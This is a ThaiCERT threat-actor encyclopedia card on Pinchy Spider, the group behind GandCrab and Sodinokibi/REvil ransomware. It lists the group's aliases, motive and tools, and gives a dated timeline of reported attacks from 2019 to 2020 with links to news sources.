ETDA ThaiCERT
Report
Search
Home > List all groups > Pinchy Spider, Gold Southfield

Threat Group Cards: A Threat Actor Encyclopedia

Permanent link Other threat group: Pinchy Spider, Gold Southfield

NamesPinchy Spider (CrowdStrike)
Gold Southfield (SecureWorks)
Gold Garden (SecureWorks)
CountryRussia Russia
MotivationFinancial gain
First seen2018
Description(CrowdStrike) CrowdStrike Intelligence has recently observed Pinchy Spider affiliates deploying GandCrab ransomware in enterprise environments, using lateral movement techniques and tooling commonly associated with nation-state adversary groups and penetration testing teams. This change in tactics makes Pinchy Spider and its affiliates the latest eCrime adversaries to join the growing trend of targeted, low-volume/high-return ransomware deployments known as “big game hunting.”

Pinchy Spider is the criminal group behind the development of the ransomware most commonly known as GandCrab, which has been active since January 2018. Pinchy Spider sells access to use GandCrab ransomware under a partnership program with a limited number of accounts. The program is operated with a 60-40 split in profits (60 percent to the customer), as is common among eCrime actors, but Pinchy Spider is also willing to negotiate up to a 70-30 split for “sophisticated” customers.

GandCrab and Sodinokibi have been observed to be distributed by DanaBot (operated by Scully Spider, TA547) and Taurus Loader (operated by Venom Spider, Golden Chickens).
ObservedCountries: Worldwide.
Tools usedcertutil, Cobalt Strike, GandCrab, Sodinokibi.
Operations performedApr 2019Sodinokibi ransomware exploits WebLogic Server vulnerability
<https://blog.talosintelligence.com/2019/04/sodinokibi-ransomware-exploits-weblogic.html>
Jun 2019Yesterday night, a source in the malware community has told ZDNet that the GandCrab RaaS operator formally announced plans to shut down their service within a month.
The announcement was made in an official thread on a well-known hacking forum, where the GandCrab RaaS has advertised its service since January 2018, when it formally launched.
<https://www.zdnet.com/article/gandcrab-ransomware-operation-says-its-shutting-down/>
Aug 2019Over 20 Texas local governments hit in 'coordinated ransomware attack'
<https://www.zdnet.com/article/at-least-20-texas-local-governments-hit-in-coordinated-ransomware-attack/>
Dec 2019CyrusOne, one of the biggest data center providers in the US, has suffered a ransomware attack, ZDNet has learned.
<https://www.zdnet.com/article/ransomware-attack-hits-major-us-data-center-provider/>
Dec 2019Sodinokibi Ransomware Behind Travelex Fiasco: Report
<https://threatpost.com/sodinokibi-ransomware-travelex-fiasco/151600/>
Dec 2019A crypto virus that attacked the Albany County Airport Authority's computer management provider during the Christmas holiday period ended up infecting the authority's servers as well, encrypting files and demanding a ransom payment.
<https://www.timesunion.com/business/article/Ransomware-attack-cripples-airport-authority-s-14963401.php>
Jan 2020New Jersey Synagogue Suffers Sodinokibi Ransomware Attack
<https://www.bleepingcomputer.com/news/security/new-jersey-synagogue-suffers-sodinokibi-ransomware-attack/>
Jan 2020Sodinokibi Ransomware Publishes Stolen Data for the First Time
They claim this data belongs to Artech Information Systems, who describe themselves as a 'minority- and women-owned diversity supplier and one of the largest IT staffing companies in the U.S', and that they will release more if a ransom is not paid.
<https://www.bleepingcomputer.com/news/security/sodinokibi-ransomware-publishes-stolen-data-for-the-first-time/>
Feb 2020The operators of the Sodinokibi Ransomware (REvil) have started urging affiliates to copy their victim's data before encrypting computers so it can be used as leverage on a new data leak site that is being launched soon.
<https://www.bleepingcomputer.com/news/security/sodinokibi-ransomware-may-tip-nasdaq-on-attacks-to-hurt-stock-prices/>
Feb 2020The operators behind Sodinokibi Ransomware published download links to files containing what they claim is financial and work documents, as well as customers' personal data stolen from giant U.S. fashion house Kenneth Cole Productions.
<https://www.bleepingcomputer.com/news/security/sodinokibi-ransomware-posts-alleged-data-of-kenneth-cole-fashion-giant/>
Mar 2020The operators of the Sodinokibi Ransomware are threatening to publicly share a company's 'dirty' financial secrets because they refused to pay the demanded ransom.
As organizations decide to restore their data manually or via backups instead of paying ransoms, ransomware operators are escalating their attacks.
<https://www.bleepingcomputer.com/news/security/ransomware-threatens-to-reveal-companys-dirty-secrets/>
Mar 2020Recently, the Sodinokibi Ransomware operators published over 12 GB of stolen data allegedly belonging to a company named Brooks International for not paying the ransom.
<https://www.bleepingcomputer.com/news/security/sodinokibi-ransomware-data-leaks-now-sold-on-hacker-forums/>
Apr 2020Sodinokibi Ransomware to stop taking Bitcoin to hide money trail
<https://www.bleepingcomputer.com/news/security/sodinokibi-ransomware-to-stop-taking-bitcoin-to-hide-money-trail/>
Apr 2020SeaChange video platform allegedly hit by Sodinokibi ransomware
<https://www.bleepingcomputer.com/news/security/seachange-video-platform-allegedly-hit-by-sodinokibi-ransomware/>
May 2020REvil ransomware threatens to leak A-list celebrities' legal docs
<https://www.bleepingcomputer.com/news/security/revil-ransomware-threatens-to-leak-a-list-celebrities-legal-docs/>
May 2020REvil ransomware gang publishes 'Elexon staff's passports' after UK electrical middleman shrugs off attack
<https://www.theregister.com/2020/06/01/elexon_ransomware_was_revil_sodinokibi/>
May 2020Here come REvil ransomware operators with another massive data leak. In this instance, they leaked the confidential data of Agromart Group, well-known crop production partners.
<https://cybleinc.com/2020/06/02/times-up-for-agromart-group-and-their-data-got-leaked-by-revil-ransomware-operators/>
Jun 2020REvil ransomware creates eBay-like auction site for stolen data
<https://www.bleepingcomputer.com/news/security/revil-ransomware-creates-ebay-like-auction-site-for-stolen-data/>
Jun 2020REvil ransomware operators have been observed while scanning one of their victim's network for Point of Sale (PoS) servers by researchers with Symantec's Threat Intelligence team.
<https://www.bleepingcomputer.com/news/security/revil-ransomware-scans-victims-network-for-point-of-sale-systems/>
Jun 2020The threat actor behind the Sodinokibi (REvil) ransomware is demanding a $14 million ransom from Brazilian-based electrical energy company Light S.A.
<https://www.securityweek.com/ransomware-operators-demand-14-million-power-company>
Jul 2020A ransomware gang has infected the internal network of Telecom Argentina, one of the country's largest internet service providers, and is now asking for a $7.5 million ransom demand to unlock encrypted files.
<https://www.zdnet.com/article/ransomware-gang-demands-7-5-million-from-argentinian-isp/>
Jul 2020Administrador de Infraestructuras Ferroviarias (ADIF), a Spanish state-owned railway infrastructure manager was hit by REVil ransomware operators.
<https://securityaffairs.co/wordpress/106304/cyber-crime/adif-revil-ransomware-attack.html>
Aug 2020Brown-Forman, one of the largest U.S. companies in the spirits and wine business, suffered a cyber attack. The intruders allegedly copied 1TB of confidential data.
<https://www.bleepingcomputer.com/news/security/us-spirits-and-wine-giant-hit-by-cyberattack-1tb-of-data-stolen/>
Sep 2020REvil ransomware deposits $1 million in hacker recruitment drive
<https://www.bleepingcomputer.com/news/security/revil-ransomware-deposits-1-million-in-hacker-recruitment-drive/>
Counter operationsJul 2020GandCrab ransomware operator arrested in Belarus
<https://www.bleepingcomputer.com/news/security/gandcrab-ransomware-operator-arrested-in-belarus/>
Information<https://www.crowdstrike.com/blog/pinchy-spider-adopts-big-game-hunting/>
<https://krebsonsecurity.com/2019/07/whos-behind-the-gandcrab-ransomware/>
<https://www.secureworks.com/blog/revil-the-gandcrab-connection>
<https://blog.morphisec.com/threat-profile-gandcrab-ransomware>
<https://www.kpn.com/security-blogs/Tracking-REvil.htm>
<https://www.cybereason.com/blog/the-sodinokibi-ransomware-attack>

Last change to this card: 19 October 2020

Download this actor card in PDF or JSON format

Previous: Parinacota
Next: Retefe Gang, Operation Emmental

Thailand Computer Emergency Response Team (ThaiCERT)
Electronic Transactions Development Agency

Follow us on

Facebook Twitter

Report incidents

Telephone +66 (0)2-123-1234
E-mail report@thaicert.or.th
PGP Download PGP key